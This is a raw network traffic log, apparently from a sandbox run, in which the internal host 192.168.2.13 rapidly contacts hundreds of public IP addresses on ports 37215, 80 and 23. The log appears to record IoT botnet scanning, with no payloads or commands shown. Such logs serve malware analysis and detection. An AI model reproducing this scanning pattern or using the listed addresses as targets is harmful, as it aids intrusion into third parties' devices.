                            Jun 10, 2024 15:37:58.458528042 CEST3040137215192.168.2.13156.4.150.72
                            Jun 10, 2024 15:37:58.458528996 CEST3040137215192.168.2.13156.253.141.133
                            Jun 10, 2024 15:37:58.458528996 CEST3040137215192.168.2.1341.25.49.153
                            Jun 10, 2024 15:37:58.458529949 CEST3040137215192.168.2.1341.104.213.101
                            Jun 10, 2024 15:37:58.458538055 CEST3040137215192.168.2.1341.116.155.141
                            Jun 10, 2024 15:37:58.458539009 CEST3040137215192.168.2.13197.37.21.3
                            Jun 10, 2024 15:37:58.458540916 CEST1683380192.168.2.13150.149.210.64
                            Jun 10, 2024 15:37:58.458554029 CEST3040137215192.168.2.13156.12.217.211
                            Jun 10, 2024 15:37:58.458563089 CEST1683380192.168.2.1389.5.191.31
                            Jun 10, 2024 15:37:58.458574057 CEST3040137215192.168.2.1341.178.187.242
                            Jun 10, 2024 15:37:58.458578110 CEST3040137215192.168.2.13156.213.78.215
                            Jun 10, 2024 15:37:58.458580017 CEST1683380192.168.2.13143.28.155.62
                            Jun 10, 2024 15:37:58.458584070 CEST1683380192.168.2.13123.81.102.171
                            Jun 10, 2024 15:37:58.458584070 CEST3040137215192.168.2.13156.11.223.48
                            Jun 10, 2024 15:37:58.458597898 CEST1683380192.168.2.13217.140.220.168
                            Jun 10, 2024 15:37:58.458602905 CEST3040137215192.168.2.1341.62.199.115
                            Jun 10, 2024 15:37:58.458602905 CEST1683380192.168.2.131.35.33.240
                            Jun 10, 2024 15:37:58.458614111 CEST3040137215192.168.2.1341.74.206.133
                            Jun 10, 2024 15:37:58.458614111 CEST3040137215192.168.2.1341.70.221.1
                            Jun 10, 2024 15:37:58.458620071 CEST1683380192.168.2.1347.5.123.175
                            Jun 10, 2024 15:37:58.458620071 CEST3040137215192.168.2.13197.218.28.17
                            Jun 10, 2024 15:37:58.458626032 CEST1683380192.168.2.13123.248.213.63
                            Jun 10, 2024 15:37:58.458635092 CEST3040137215192.168.2.1341.109.189.68
                            Jun 10, 2024 15:37:58.458636999 CEST3040137215192.168.2.1341.78.69.134
                            Jun 10, 2024 15:37:58.458636999 CEST3040137215192.168.2.13156.97.62.235
                            Jun 10, 2024 15:37:58.458642960 CEST1683380192.168.2.1397.198.1.8
                            Jun 10, 2024 15:37:58.458648920 CEST3040137215192.168.2.13156.43.175.240
                            Jun 10, 2024 15:37:58.458650112 CEST3040137215192.168.2.1341.140.76.152
                            Jun 10, 2024 15:37:58.458655119 CEST1683380192.168.2.13110.126.158.141
                            Jun 10, 2024 15:37:58.458655119 CEST1683380192.168.2.13175.100.24.56
                            Jun 10, 2024 15:37:58.458663940 CEST3040137215192.168.2.13156.96.80.253
                            Jun 10, 2024 15:37:58.458667994 CEST3040137215192.168.2.1341.126.47.161
                            Jun 10, 2024 15:37:58.458678007 CEST3040137215192.168.2.1341.37.141.110
                            Jun 10, 2024 15:37:58.458683968 CEST1683380192.168.2.1395.38.158.165
                            Jun 10, 2024 15:37:58.458689928 CEST1683380192.168.2.13103.69.42.187
                            Jun 10, 2024 15:37:58.458689928 CEST1683380192.168.2.1350.205.36.111
                            Jun 10, 2024 15:37:58.458695889 CEST1683380192.168.2.13134.105.17.4
                            Jun 10, 2024 15:37:58.458695889 CEST1683380192.168.2.1362.153.234.179
                            Jun 10, 2024 15:37:58.458709955 CEST3040137215192.168.2.13156.230.215.177
                            Jun 10, 2024 15:37:58.458714008 CEST1683380192.168.2.1353.62.65.36
                            Jun 10, 2024 15:37:58.458715916 CEST1683380192.168.2.1366.205.85.77
                            Jun 10, 2024 15:37:58.458729029 CEST3040137215192.168.2.1341.41.180.43
                            Jun 10, 2024 15:37:58.458734989 CEST3040137215192.168.2.13156.78.117.33
                            Jun 10, 2024 15:37:58.458745956 CEST3040137215192.168.2.13156.236.106.252
                            Jun 10, 2024 15:37:58.458745956 CEST3040137215192.168.2.1341.94.210.141
                            Jun 10, 2024 15:37:58.458745956 CEST3040137215192.168.2.1341.221.84.91
                            Jun 10, 2024 15:37:58.458749056 CEST3040137215192.168.2.1341.59.50.237
                            Jun 10, 2024 15:37:58.458761930 CEST3040137215192.168.2.13156.186.90.45
                            Jun 10, 2024 15:37:58.458775043 CEST3040137215192.168.2.1341.38.6.150
                            Jun 10, 2024 15:37:58.458775043 CEST1683380192.168.2.13123.162.236.151
                            Jun 10, 2024 15:37:58.458790064 CEST1683380192.168.2.13205.237.21.82
                            Jun 10, 2024 15:37:58.458790064 CEST3040137215192.168.2.13197.85.190.87
                            Jun 10, 2024 15:37:58.458797932 CEST3040137215192.168.2.13156.105.160.242
                            Jun 10, 2024 15:37:58.458797932 CEST3040137215192.168.2.1341.197.138.136
                            Jun 10, 2024 15:37:58.458810091 CEST3040137215192.168.2.1341.65.239.136
                            Jun 10, 2024 15:37:58.458811998 CEST3040137215192.168.2.1341.38.42.170
                            Jun 10, 2024 15:37:58.458811998 CEST3040137215192.168.2.13156.134.139.194
                            Jun 10, 2024 15:37:58.458817959 CEST1683380192.168.2.13162.203.255.83
                            Jun 10, 2024 15:37:58.458818913 CEST3040137215192.168.2.13197.105.77.33
                            Jun 10, 2024 15:37:58.458817959 CEST3040137215192.168.2.13156.107.193.134
                            Jun 10, 2024 15:37:58.458818913 CEST3040137215192.168.2.13197.67.60.182
                            Jun 10, 2024 15:37:58.458825111 CEST3040137215192.168.2.13197.120.119.143
                            Jun 10, 2024 15:37:58.458825111 CEST3040137215192.168.2.13156.72.196.183
                            Jun 10, 2024 15:37:58.458825111 CEST3040137215192.168.2.13197.15.249.219
                            Jun 10, 2024 15:37:58.458827019 CEST3040137215192.168.2.13156.152.97.183
                            Jun 10, 2024 15:37:58.458839893 CEST1683380192.168.2.1373.77.71.87
                            Jun 10, 2024 15:37:58.458843946 CEST1683380192.168.2.1397.34.9.110
                            Jun 10, 2024 15:37:58.458853960 CEST3040137215192.168.2.13197.77.245.185
                            Jun 10, 2024 15:37:58.458853960 CEST1683380192.168.2.1394.180.92.242
                            Jun 10, 2024 15:37:58.458858967 CEST3040137215192.168.2.1341.10.244.42
                            Jun 10, 2024 15:37:58.458858967 CEST3040137215192.168.2.13197.218.43.202
                            Jun 10, 2024 15:37:58.458867073 CEST3040137215192.168.2.13156.55.154.141
                            Jun 10, 2024 15:37:58.458867073 CEST3040137215192.168.2.13197.168.80.221
                            Jun 10, 2024 15:37:58.458868027 CEST1683380192.168.2.1367.138.130.174
                            Jun 10, 2024 15:37:58.458873987 CEST3040137215192.168.2.13197.174.6.140
                            Jun 10, 2024 15:37:58.458873987 CEST3040137215192.168.2.13197.231.140.160
                            Jun 10, 2024 15:37:58.458873987 CEST1683380192.168.2.13181.40.86.242
                            Jun 10, 2024 15:37:58.458873987 CEST3040137215192.168.2.1341.148.151.110
                            Jun 10, 2024 15:37:58.458904028 CEST3040137215192.168.2.13156.1.252.24
                            Jun 10, 2024 15:37:58.458904982 CEST1683380192.168.2.131.235.38.96
                            Jun 10, 2024 15:37:58.458904982 CEST1683380192.168.2.1353.98.252.58
                            Jun 10, 2024 15:37:58.458908081 CEST3040137215192.168.2.13197.24.139.66
                            Jun 10, 2024 15:37:58.458916903 CEST1683380192.168.2.13196.157.13.118
                            Jun 10, 2024 15:37:58.458918095 CEST1683380192.168.2.13140.101.197.21
                            Jun 10, 2024 15:37:58.458920002 CEST1683380192.168.2.1394.100.178.14
                            Jun 10, 2024 15:37:58.458930969 CEST3040137215192.168.2.13197.172.155.122
                            Jun 10, 2024 15:37:58.458935976 CEST3040137215192.168.2.13197.243.244.21
                            Jun 10, 2024 15:37:58.458945036 CEST3040137215192.168.2.1341.124.110.151
                            Jun 10, 2024 15:37:58.458945036 CEST3040137215192.168.2.1341.175.184.197
                            Jun 10, 2024 15:37:58.458947897 CEST1683380192.168.2.1318.32.122.88
                            Jun 10, 2024 15:37:58.458947897 CEST3040137215192.168.2.13197.188.13.153
                            Jun 10, 2024 15:37:58.458952904 CEST3040137215192.168.2.1341.147.113.230
                            Jun 10, 2024 15:37:58.458966970 CEST1683380192.168.2.13133.189.0.217
                            Jun 10, 2024 15:37:58.458980083 CEST1683380192.168.2.1364.96.27.44
                            Jun 10, 2024 15:37:58.458980083 CEST1683380192.168.2.13181.222.2.252
                            Jun 10, 2024 15:37:58.458981991 CEST1683380192.168.2.13184.30.88.108
                            Jun 10, 2024 15:37:58.458983898 CEST3040137215192.168.2.13197.127.76.184
                            Jun 10, 2024 15:37:58.458986044 CEST1683380192.168.2.13147.231.22.235
                            Jun 10, 2024 15:37:58.458990097 CEST1683380192.168.2.13111.22.101.54
                            Jun 10, 2024 15:37:58.459007978 CEST1683380192.168.2.13153.114.124.54
                            Jun 10, 2024 15:37:58.459008932 CEST1683380192.168.2.13207.248.119.145
                            Jun 10, 2024 15:37:58.459008932 CEST1683380192.168.2.13124.89.68.54
                            Jun 10, 2024 15:37:58.459008932 CEST1683380192.168.2.1370.127.36.150
                            Jun 10, 2024 15:37:58.459017038 CEST3040137215192.168.2.13156.185.10.55
                            Jun 10, 2024 15:37:58.459017038 CEST3040137215192.168.2.1341.86.145.145
                            Jun 10, 2024 15:37:58.459017038 CEST1683380192.168.2.13196.212.69.203
                            Jun 10, 2024 15:37:58.459019899 CEST3040137215192.168.2.13197.62.240.51
                            Jun 10, 2024 15:37:58.459036112 CEST3040137215192.168.2.13197.107.210.65
                            Jun 10, 2024 15:37:58.459041119 CEST3040137215192.168.2.13156.248.189.123
                            Jun 10, 2024 15:37:58.459055901 CEST1683380192.168.2.1345.222.20.5
                            Jun 10, 2024 15:37:58.459059954 CEST3040137215192.168.2.1341.250.250.184
                            Jun 10, 2024 15:37:58.459059954 CEST3040137215192.168.2.1341.137.56.71
                            Jun 10, 2024 15:37:58.459064960 CEST1683380192.168.2.1378.179.28.249
                            Jun 10, 2024 15:37:58.459067106 CEST1683380192.168.2.1353.171.197.44
                            Jun 10, 2024 15:37:58.459073067 CEST1683380192.168.2.13156.94.157.86
                            Jun 10, 2024 15:37:58.459073067 CEST3040137215192.168.2.13156.252.179.159
                            Jun 10, 2024 15:37:58.459074974 CEST3040137215192.168.2.13197.222.103.196
                            Jun 10, 2024 15:37:58.459073067 CEST3040137215192.168.2.13197.121.216.212
                            Jun 10, 2024 15:37:58.459073067 CEST3040137215192.168.2.13156.34.211.222
                            Jun 10, 2024 15:37:58.459079981 CEST3040137215192.168.2.13156.239.8.85
                            Jun 10, 2024 15:37:58.459089994 CEST1683380192.168.2.1359.232.57.123
                            Jun 10, 2024 15:37:58.459093094 CEST1683380192.168.2.13140.226.212.189
                            Jun 10, 2024 15:37:58.459094048 CEST1683380192.168.2.13191.231.196.140
                            Jun 10, 2024 15:37:58.459094048 CEST3040137215192.168.2.13156.183.251.127
                            Jun 10, 2024 15:37:58.459095955 CEST1683380192.168.2.1374.69.189.68
                            Jun 10, 2024 15:37:58.459104061 CEST3040137215192.168.2.1341.203.233.46
                            Jun 10, 2024 15:37:58.459103107 CEST3040137215192.168.2.13156.171.85.63
                            Jun 10, 2024 15:37:58.459105968 CEST1683380192.168.2.1334.192.125.101
                            Jun 10, 2024 15:37:58.459115028 CEST1683380192.168.2.1363.106.192.182
                            Jun 10, 2024 15:37:58.459115028 CEST1683380192.168.2.1397.2.85.138
                            Jun 10, 2024 15:37:58.459119081 CEST3040137215192.168.2.1341.57.52.239
                            Jun 10, 2024 15:37:58.459119081 CEST3040137215192.168.2.13156.46.29.55
                            Jun 10, 2024 15:37:58.459129095 CEST3040137215192.168.2.1341.104.26.218
                            Jun 10, 2024 15:37:58.459129095 CEST1683380192.168.2.13140.165.163.222
                            Jun 10, 2024 15:37:58.459131956 CEST3040137215192.168.2.13156.155.245.145
                            Jun 10, 2024 15:37:58.459131956 CEST3040137215192.168.2.13156.0.205.101
                            Jun 10, 2024 15:37:58.459131956 CEST1683380192.168.2.1378.170.4.232
                            Jun 10, 2024 15:37:58.459140062 CEST3040137215192.168.2.13156.156.244.24
                            Jun 10, 2024 15:37:58.459142923 CEST3040137215192.168.2.13197.1.240.111
                            Jun 10, 2024 15:37:58.459146023 CEST3040137215192.168.2.1341.247.67.212
                            Jun 10, 2024 15:37:58.459150076 CEST3040137215192.168.2.13197.92.212.5
                            Jun 10, 2024 15:37:58.459150076 CEST3040137215192.168.2.13156.33.108.230
                            Jun 10, 2024 15:37:58.459165096 CEST3040137215192.168.2.13156.177.212.186
                            Jun 10, 2024 15:37:58.459166050 CEST3040137215192.168.2.13156.179.100.196
                            Jun 10, 2024 15:37:58.459180117 CEST3040137215192.168.2.1341.55.24.26
                            Jun 10, 2024 15:37:58.459180117 CEST1683380192.168.2.13200.138.82.75
                            Jun 10, 2024 15:37:58.459184885 CEST1683380192.168.2.13134.162.169.75
                            Jun 10, 2024 15:37:58.459202051 CEST1683380192.168.2.13190.71.246.251
                            Jun 10, 2024 15:37:58.459207058 CEST1683380192.168.2.13136.181.217.250
                            Jun 10, 2024 15:37:58.459207058 CEST1683380192.168.2.1314.80.201.105
                            Jun 10, 2024 15:37:58.459217072 CEST1683380192.168.2.1380.44.181.39
                            Jun 10, 2024 15:37:58.459244013 CEST3040137215192.168.2.13156.235.172.187
                            Jun 10, 2024 15:37:58.459244013 CEST1683380192.168.2.13131.126.47.253
                            Jun 10, 2024 15:37:58.459249973 CEST1683380192.168.2.1354.135.120.141
                            Jun 10, 2024 15:37:58.459268093 CEST1683380192.168.2.131.35.81.53
                            Jun 10, 2024 15:37:58.459274054 CEST1683380192.168.2.13158.170.218.198
                            Jun 10, 2024 15:37:58.459274054 CEST1683380192.168.2.1383.98.192.104
                            Jun 10, 2024 15:37:58.459278107 CEST3040137215192.168.2.1341.157.224.172
                            Jun 10, 2024 15:37:58.459291935 CEST3040137215192.168.2.13197.221.129.41
                            Jun 10, 2024 15:37:58.459294081 CEST1683380192.168.2.1367.119.53.6
                            Jun 10, 2024 15:37:58.459294081 CEST3040137215192.168.2.13197.49.53.13
                            Jun 10, 2024 15:37:58.459296942 CEST3040137215192.168.2.13156.221.145.171
                            Jun 10, 2024 15:37:58.459296942 CEST1683380192.168.2.13147.70.177.121
                            Jun 10, 2024 15:37:58.459301949 CEST3040137215192.168.2.1341.207.184.151
                            Jun 10, 2024 15:37:58.459312916 CEST3040137215192.168.2.13156.17.122.194
                            Jun 10, 2024 15:37:58.459312916 CEST1683380192.168.2.13158.115.121.61
                            Jun 10, 2024 15:37:58.459312916 CEST3040137215192.168.2.13197.185.134.203
                            Jun 10, 2024 15:37:58.459317923 CEST1683380192.168.2.1347.99.117.193
                            Jun 10, 2024 15:37:58.459317923 CEST3040137215192.168.2.13156.226.176.129
                            Jun 10, 2024 15:37:58.459317923 CEST3040137215192.168.2.13156.204.224.14
                            Jun 10, 2024 15:37:58.459328890 CEST3040137215192.168.2.13156.201.148.50
                            Jun 10, 2024 15:37:58.459336996 CEST3040137215192.168.2.13156.188.33.125
                            Jun 10, 2024 15:37:58.459338903 CEST3040137215192.168.2.13197.110.153.12
                            Jun 10, 2024 15:37:58.459347010 CEST3040137215192.168.2.13197.84.65.24
                            Jun 10, 2024 15:37:58.459347010 CEST1683380192.168.2.1365.19.124.123
                            Jun 10, 2024 15:37:58.459358931 CEST3040137215192.168.2.13156.103.26.204
                            Jun 10, 2024 15:37:58.459363937 CEST1683380192.168.2.132.189.163.58
                            Jun 10, 2024 15:37:58.459364891 CEST3040137215192.168.2.13156.233.69.178
                            Jun 10, 2024 15:37:58.459373951 CEST3040137215192.168.2.13197.49.200.66
                            Jun 10, 2024 15:37:58.459379911 CEST1683380192.168.2.13146.250.96.87
                            Jun 10, 2024 15:37:58.459389925 CEST3040137215192.168.2.1341.176.37.140
                            Jun 10, 2024 15:37:58.459389925 CEST1683380192.168.2.1320.103.214.14
                            Jun 10, 2024 15:37:58.459397078 CEST3040137215192.168.2.13156.9.88.239
                            Jun 10, 2024 15:37:58.459398031 CEST3040137215192.168.2.13156.183.36.228
                            Jun 10, 2024 15:37:58.459398985 CEST3040137215192.168.2.1341.179.45.254
                            Jun 10, 2024 15:37:58.459423065 CEST3040137215192.168.2.1341.151.139.109
                            Jun 10, 2024 15:37:58.459424019 CEST3040137215192.168.2.1341.71.92.89
                            Jun 10, 2024 15:37:58.459429979 CEST3040137215192.168.2.1341.41.221.146
                            Jun 10, 2024 15:37:58.459429979 CEST1683380192.168.2.13120.20.249.122
                            Jun 10, 2024 15:37:58.459434986 CEST3040137215192.168.2.13197.219.70.72
                            Jun 10, 2024 15:37:58.459439993 CEST3040137215192.168.2.13156.2.124.85
                            Jun 10, 2024 15:37:58.459439993 CEST1683380192.168.2.13111.88.201.58
                            Jun 10, 2024 15:37:58.459439993 CEST3040137215192.168.2.13197.125.190.64
                            Jun 10, 2024 15:37:58.459462881 CEST3040137215192.168.2.13197.62.66.22
                            Jun 10, 2024 15:37:58.459462881 CEST3040137215192.168.2.1341.209.102.150
                            Jun 10, 2024 15:37:58.459465981 CEST1683380192.168.2.1367.122.134.76
                            Jun 10, 2024 15:37:58.459472895 CEST3040137215192.168.2.1341.105.214.229
                            Jun 10, 2024 15:37:58.459475994 CEST3040137215192.168.2.1341.8.33.0
                            Jun 10, 2024 15:37:58.459487915 CEST3040137215192.168.2.1341.199.228.40
                            Jun 10, 2024 15:37:58.459487915 CEST3040137215192.168.2.13156.199.172.162
                            Jun 10, 2024 15:37:58.459490061 CEST3040137215192.168.2.13156.18.60.252
                            Jun 10, 2024 15:37:58.459491014 CEST3040137215192.168.2.13197.207.96.120
                            Jun 10, 2024 15:37:58.459501028 CEST3040137215192.168.2.13156.131.46.81
                            Jun 10, 2024 15:37:58.459501028 CEST3040137215192.168.2.13156.79.242.90
                            Jun 10, 2024 15:37:58.459501982 CEST3040137215192.168.2.13156.223.238.77
                            Jun 10, 2024 15:37:58.459503889 CEST3040137215192.168.2.1341.151.251.55
                            Jun 10, 2024 15:37:58.459507942 CEST1683380192.168.2.13194.211.56.104
                            Jun 10, 2024 15:37:58.459508896 CEST3040137215192.168.2.1341.162.217.198
                            Jun 10, 2024 15:37:58.459508896 CEST3040137215192.168.2.13156.115.213.35
                            Jun 10, 2024 15:37:58.459508896 CEST3040137215192.168.2.13197.214.115.45
                            Jun 10, 2024 15:37:58.459511995 CEST3040137215192.168.2.13156.152.113.181
                            Jun 10, 2024 15:37:58.459511995 CEST1683380192.168.2.1313.56.173.158
                            Jun 10, 2024 15:37:58.459522009 CEST3040137215192.168.2.13197.59.134.153
                            Jun 10, 2024 15:37:58.459522009 CEST3040137215192.168.2.13156.51.141.128
                            Jun 10, 2024 15:37:58.459522009 CEST3040137215192.168.2.1341.110.181.97
                            Jun 10, 2024 15:37:58.459522963 CEST3040137215192.168.2.13197.117.227.181
                            Jun 10, 2024 15:37:58.459536076 CEST1683380192.168.2.13168.24.60.63
                            Jun 10, 2024 15:37:58.459541082 CEST3040137215192.168.2.13156.12.231.179
                            Jun 10, 2024 15:37:58.459542036 CEST3040137215192.168.2.13156.170.243.98
                            Jun 10, 2024 15:37:58.459557056 CEST1683380192.168.2.1335.219.97.25
                            Jun 10, 2024 15:37:58.459557056 CEST3040137215192.168.2.13197.92.111.93
                            Jun 10, 2024 15:37:58.459580898 CEST1683380192.168.2.134.35.61.244
                            Jun 10, 2024 15:37:58.459589005 CEST1683380192.168.2.13148.139.133.210
                            Jun 10, 2024 15:37:58.459611893 CEST1683380192.168.2.13193.171.109.56
                            Jun 10, 2024 15:37:58.459635973 CEST1683380192.168.2.13144.71.180.84
                            Jun 10, 2024 15:37:58.459635973 CEST1683380192.168.2.1369.49.69.136
                            Jun 10, 2024 15:37:58.459646940 CEST1683380192.168.2.13211.160.156.73
                            Jun 10, 2024 15:37:58.459647894 CEST1683380192.168.2.13168.59.197.40
                            Jun 10, 2024 15:37:58.459660053 CEST1683380192.168.2.1318.149.122.44
                            Jun 10, 2024 15:37:58.459672928 CEST1683380192.168.2.1339.85.248.251
                            Jun 10, 2024 15:37:58.459697008 CEST1683380192.168.2.13181.173.119.40
                            Jun 10, 2024 15:37:58.459697008 CEST1683380192.168.2.1349.40.81.134
                            Jun 10, 2024 15:37:58.459707022 CEST1683380192.168.2.1385.74.64.226
                            Jun 10, 2024 15:37:58.459712982 CEST1683380192.168.2.13131.216.178.254
                            Jun 10, 2024 15:37:58.459747076 CEST1683380192.168.2.13203.129.32.100
                            Jun 10, 2024 15:37:58.459760904 CEST1683380192.168.2.1335.103.207.150
                            Jun 10, 2024 15:37:58.459760904 CEST1683380192.168.2.13222.79.242.11
                            Jun 10, 2024 15:37:58.459793091 CEST1683380192.168.2.13170.66.97.164
                            Jun 10, 2024 15:37:58.459808111 CEST1683380192.168.2.13132.139.52.220
                            Jun 10, 2024 15:37:58.459822893 CEST1683380192.168.2.1391.48.178.235
                            Jun 10, 2024 15:37:58.459824085 CEST1683380192.168.2.1336.83.112.138
                            Jun 10, 2024 15:37:58.459827900 CEST1683380192.168.2.13116.251.30.70
                            Jun 10, 2024 15:37:58.459829092 CEST1683380192.168.2.1377.183.43.209
                            Jun 10, 2024 15:37:58.459855080 CEST1683380192.168.2.13212.65.128.236
                            Jun 10, 2024 15:37:58.459875107 CEST1683380192.168.2.1319.163.217.6
                            Jun 10, 2024 15:37:58.459875107 CEST1683380192.168.2.1389.73.72.200
                            Jun 10, 2024 15:37:58.459877968 CEST1683380192.168.2.1352.118.113.204
                            Jun 10, 2024 15:37:58.459897995 CEST1683380192.168.2.13183.180.158.37
                            Jun 10, 2024 15:37:58.459935904 CEST1683380192.168.2.13159.193.247.198
                            Jun 10, 2024 15:37:58.459945917 CEST1683380192.168.2.1387.101.156.8
                            Jun 10, 2024 15:37:58.459959030 CEST1683380192.168.2.13206.74.220.141
                            Jun 10, 2024 15:37:58.459963083 CEST1683380192.168.2.13212.148.218.185
                            Jun 10, 2024 15:37:58.459968090 CEST1683380192.168.2.13155.219.109.111
                            Jun 10, 2024 15:37:58.459970951 CEST1683380192.168.2.1343.26.133.47
                            Jun 10, 2024 15:37:58.460001945 CEST1683380192.168.2.1340.14.87.7
                            Jun 10, 2024 15:37:58.460011959 CEST1683380192.168.2.1339.252.119.69
                            Jun 10, 2024 15:37:58.460017920 CEST2326049198.196.238.94192.168.2.13
                            Jun 10, 2024 15:37:58.460021973 CEST1683380192.168.2.1312.70.8.218
                            Jun 10, 2024 15:37:58.460036039 CEST2326049190.141.124.206192.168.2.13
                            Jun 10, 2024 15:37:58.460046053 CEST1683380192.168.2.13103.147.236.94
                            Jun 10, 2024 15:37:58.460048914 CEST2604923192.168.2.13198.196.238.94
                            Jun 10, 2024 15:37:58.460050106 CEST232604976.169.88.76192.168.2.13
                            Jun 10, 2024 15:37:58.460063934 CEST2326049164.30.234.118192.168.2.13
                            Jun 10, 2024 15:37:58.460066080 CEST1683380192.168.2.13223.173.173.136
                            Jun 10, 2024 15:37:58.460074902 CEST2604923192.168.2.13190.141.124.206
                            Jun 10, 2024 15:37:58.460077047 CEST2326049132.10.73.79192.168.2.13
                            Jun 10, 2024 15:37:58.460088968 CEST2604923192.168.2.1376.169.88.76
                            Jun 10, 2024 15:37:58.460089922 CEST2326049125.164.23.124192.168.2.13
                            Jun 10, 2024 15:37:58.460095882 CEST1683380192.168.2.13193.217.189.207
                            Jun 10, 2024 15:37:58.460103989 CEST232604932.142.136.96192.168.2.13
                            Jun 10, 2024 15:37:58.460105896 CEST2604923192.168.2.13164.30.234.118
                            Jun 10, 2024 15:37:58.460105896 CEST2604923192.168.2.13132.10.73.79
                            Jun 10, 2024 15:37:58.460112095 CEST1683380192.168.2.1339.224.6.63
                            Jun 10, 2024 15:37:58.460118055 CEST232604938.96.88.10192.168.2.13
                            Jun 10, 2024 15:37:58.460130930 CEST232604975.67.196.229192.168.2.13
                            Jun 10, 2024 15:37:58.460136890 CEST2604923192.168.2.1332.142.136.96
                            Jun 10, 2024 15:37:58.460136890 CEST2604923192.168.2.13125.164.23.124
                            Jun 10, 2024 15:37:58.460144043 CEST232604950.75.214.252192.168.2.13
                            Jun 10, 2024 15:37:58.460150003 CEST1683380192.168.2.1366.160.227.118
                            Jun 10, 2024 15:37:58.460154057 CEST2604923192.168.2.1338.96.88.10
                            Jun 10, 2024 15:37:58.460154057 CEST1683380192.168.2.13199.93.138.167
                            Jun 10, 2024 15:37:58.460159063 CEST2326049182.236.184.51192.168.2.13
                            Jun 10, 2024 15:37:58.460169077 CEST2604923192.168.2.1375.67.196.229
                            Jun 10, 2024 15:37:58.460170984 CEST2326049124.121.191.188192.168.2.13
                            Jun 10, 2024 15:37:58.460177898 CEST2604923192.168.2.1350.75.214.252
                            Jun 10, 2024 15:37:58.460185051 CEST232604939.243.190.181192.168.2.13
                            Jun 10, 2024 15:37:58.460186958 CEST2604923192.168.2.13182.236.184.51
                            Jun 10, 2024 15:37:58.460196972 CEST2326049186.72.96.4192.168.2.13
                            Jun 10, 2024 15:37:58.460206985 CEST2604923192.168.2.13124.121.191.188
                            Jun 10, 2024 15:37:58.460208893 CEST232604992.134.95.48192.168.2.13
                            Jun 10, 2024 15:37:58.460222006 CEST2326049223.100.103.1192.168.2.13
                            Jun 10, 2024 15:37:58.460222960 CEST2604923192.168.2.1339.243.190.181
                            Jun 10, 2024 15:37:58.460233927 CEST1683380192.168.2.13139.16.114.209
                            Jun 10, 2024 15:37:58.460233927 CEST2604923192.168.2.13186.72.96.4
                            Jun 10, 2024 15:37:58.460235119 CEST2326049134.211.186.43192.168.2.13
                            Jun 10, 2024 15:37:58.460243940 CEST2604923192.168.2.1392.134.95.48
                            Jun 10, 2024 15:37:58.460243940 CEST2604923192.168.2.13223.100.103.1
                            Jun 10, 2024 15:37:58.460247040 CEST2326049197.152.224.238192.168.2.13
                            Jun 10, 2024 15:37:58.460258961 CEST232604970.73.181.197192.168.2.13
                            Jun 10, 2024 15:37:58.460263014 CEST2604923192.168.2.13134.211.186.43
                            Jun 10, 2024 15:37:58.460272074 CEST2326049116.57.6.68192.168.2.13
                            Jun 10, 2024 15:37:58.460283995 CEST2326049109.187.83.5192.168.2.13
                            Jun 10, 2024 15:37:58.460287094 CEST2604923192.168.2.1370.73.181.197
                            Jun 10, 2024 15:37:58.460297108 CEST232604917.131.23.243192.168.2.13
                            Jun 10, 2024 15:37:58.460300922 CEST2604923192.168.2.13116.57.6.68
                            Jun 10, 2024 15:37:58.460310936 CEST23260499.174.214.160192.168.2.13
                            Jun 10, 2024 15:37:58.460314989 CEST2604923192.168.2.13109.187.83.5
                            Jun 10, 2024 15:37:58.460324049 CEST1683380192.168.2.13150.54.2.101
                            Jun 10, 2024 15:37:58.460325956 CEST2326049158.98.201.212192.168.2.13
                            Jun 10, 2024 15:37:58.460330009 CEST2604923192.168.2.1317.131.23.243
                            Jun 10, 2024 15:37:58.460340977 CEST2326049206.60.137.132192.168.2.13
                            Jun 10, 2024 15:37:58.460342884 CEST2604923192.168.2.139.174.214.160
                            Jun 10, 2024 15:37:58.460354090 CEST2326049116.220.183.75192.168.2.13
                            Jun 10, 2024 15:37:58.460359097 CEST2604923192.168.2.13158.98.201.212
                            Jun 10, 2024 15:37:58.460366964 CEST2326049128.28.27.63192.168.2.13
                            Jun 10, 2024 15:37:58.460372925 CEST2604923192.168.2.13206.60.137.132
                            Jun 10, 2024 15:37:58.460380077 CEST2326049180.91.116.84192.168.2.13
                            Jun 10, 2024 15:37:58.460387945 CEST2604923192.168.2.13116.220.183.75
                            Jun 10, 2024 15:37:58.460391998 CEST232604954.53.203.201192.168.2.13
                            Jun 10, 2024 15:37:58.460398912 CEST1683380192.168.2.1319.168.132.92
                            Jun 10, 2024 15:37:58.460401058 CEST2604923192.168.2.13197.152.224.238
                            Jun 10, 2024 15:37:58.460401058 CEST2604923192.168.2.13128.28.27.63
                            Jun 10, 2024 15:37:58.460403919 CEST232604943.86.28.152192.168.2.13
                            Jun 10, 2024 15:37:58.460413933 CEST1683380192.168.2.1385.239.85.221
                            Jun 10, 2024 15:37:58.460417032 CEST2326049158.84.29.159192.168.2.13
                            Jun 10, 2024 15:37:58.460418940 CEST2604923192.168.2.13180.91.116.84
                            Jun 10, 2024 15:37:58.460429907 CEST2326049113.249.196.233192.168.2.13
                            Jun 10, 2024 15:37:58.460432053 CEST2604923192.168.2.1354.53.203.201
                            Jun 10, 2024 15:37:58.460443020 CEST2326049155.106.171.247192.168.2.13
                            Jun 10, 2024 15:37:58.460443974 CEST2604923192.168.2.1343.86.28.152
                            Jun 10, 2024 15:37:58.460454941 CEST2326049202.138.93.178192.168.2.13
                            Jun 10, 2024 15:37:58.460460901 CEST2604923192.168.2.13158.84.29.159
                            Jun 10, 2024 15:37:58.460460901 CEST2604923192.168.2.13113.249.196.233
                            Jun 10, 2024 15:37:58.460467100 CEST2326049143.239.208.30192.168.2.13
                            Jun 10, 2024 15:37:58.460479975 CEST232604940.227.82.94192.168.2.13
                            Jun 10, 2024 15:37:58.460496902 CEST2604923192.168.2.13155.106.171.247
                            Jun 10, 2024 15:37:58.460498095 CEST1683380192.168.2.1399.98.214.85
                            Jun 10, 2024 15:37:58.460498095 CEST2604923192.168.2.13202.138.93.178
                            Jun 10, 2024 15:37:58.460500002 CEST1683380192.168.2.13206.80.212.79
                            Jun 10, 2024 15:37:58.460505962 CEST232604923.85.95.36192.168.2.13
                            Jun 10, 2024 15:37:58.460513115 CEST1683380192.168.2.13222.111.39.184
                            Jun 10, 2024 15:37:58.460513115 CEST2604923192.168.2.13143.239.208.30
                            Jun 10, 2024 15:37:58.460520029 CEST232604966.146.89.3192.168.2.13
                            Jun 10, 2024 15:37:58.460520029 CEST2604923192.168.2.1340.227.82.94
                            Jun 10, 2024 15:37:58.460534096 CEST2326049131.87.205.1192.168.2.13
                            Jun 10, 2024 15:37:58.460546017 CEST2604923192.168.2.1323.85.95.36
